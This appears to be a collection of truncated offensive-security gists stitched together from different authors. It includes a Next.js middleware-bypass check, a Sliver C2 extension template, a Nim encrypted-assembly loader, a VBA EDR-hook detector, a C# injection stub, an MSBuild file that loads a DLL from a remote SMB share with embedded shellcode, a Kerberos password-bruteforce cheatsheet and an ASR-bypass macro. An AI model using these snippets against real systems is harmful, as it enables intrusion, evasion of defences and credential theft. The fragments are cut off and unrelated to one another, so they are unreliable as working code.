fourcube

metadata:
    language: v2-beta
    name: "CVE-2025-29927 - Next.js middleware bypass"
    description: "Checks for differences in responses when using different x-middleware-subrequest header paths"
    author: "Chris Grieger - blueredix.com"
    tags: "next.js", "middleware"

run for each:
    middleware_value = "pages/_middleware",
                       "middleware",

freefirex

{
		"SliverExtension" :{
			"prefix": "sliverext",
			"body": [ "{",
					"\"name\": \"$1\",",
					"\"version\": \"0.0.0\",",
					"\"command_name\": \"$2\",",
					"\"extension_author\": \"$3\",",
					"\"original_author\": \"$3\",",
					"\"repo_url\": \"N/A\",",

ChoiSG

import nimcrypto
import winim/clr except `[]`  # https://s3cur3th1ssh1t.github.io/Playing-with-OffensiveNim/  <-- thank you so much, 2 hours googling I almost went crazy 

#[
    All credit goes to @byt3bl33d3r (OffensiveNim) and @s3cur3th1ssh1t

    nimble install winim nimcrypto zippy
    nim c -d:danger -d:strip --opt:size rsrcDecryptAssembly.nim

    slurp = "staticRead" will read the file and store it in the variable (.rdata) on compile time. 

X-C3LL

Private Declare PtrSafe Function GetModuleHandleA Lib "KERNEL32" (ByVal lpModuleName As String) As LongPtr
Private Declare PtrSafe Function GetProcAddress Lib "KERNEL32" (ByVal hModule As LongPtr, ByVal lpProcName As String) As LongPtr
Private Declare PtrSafe Sub CopyMemory Lib "KERNEL32" Alias "RtlMoveMemory" (ByVal Destination As LongPtr, ByVal Source As LongPtr, ByVal Length As Long)

'VBA Macro that detects hooks made by EDRs
'PoC By Juan Manuel Fernandez (@TheXC3LL) based on a post from SpecterOps (https://posts.specterops.io/adventures-in-dynamic-evasion-1fe0bac57aa)


Public Function checkHook(ByVal target As String, hModule As LongPtr) As Integer
    Dim address As LongPtr

Flangvik

using System;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;


namespace InjectionTest
{
    public class DELEGATES
    {

rvrsh3ll

<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
            <Target Name="MyTarget">
                <SimpleTask MyProperty="My voice is my passport."
                MyCode='<base64 encoded x64 shellcode>'
		MyProcess='C:\Program Files\Internet Explorer\iexplore.exe'/>
            </Target>
        <UsingTask TaskName="SimpleTask" AssemblyFile="\\192.168.120.129\share\IEShims.dll" />
</Project>

Arno0x

/*

================================ Compile as a .Net DLL ==============================
	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library /out:TestAssembly.dll TestAssembly.cs

*/

using System.Windows.Forms;

namespace TestNamespace

TarlogicSecurity

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

infosecn1nja

' ASR rules bypass creating child processes
' https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction
' https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office
' https://www.darkoperator.com/blog/2017/11/6/windows-defender-exploit-guard-asr-vbscriptjs-rule

Sub ASR_blocked()
    Dim WSHShell As Object
    Set WSHShell = CreateObject("Wscript.Shell")
    WSHShell.Run "cmd.exe"
End Sub

mattifestation

[
    {
        "ProviderGUID":  "72d164bf-fd64-4b2b-87a0-62dbcec9ae2a",
        "ProviderName":  "AccEventTool",
        "ProviderGroupGUID":  "4f50731a-89cf-4782-b3e0-dce8c90476ba",
        "AssociatedFilenames":  [
                                    "accevent.exe",
                                    "inspect.exe",
                                    "narrator.exe",
                                    "srh.dll"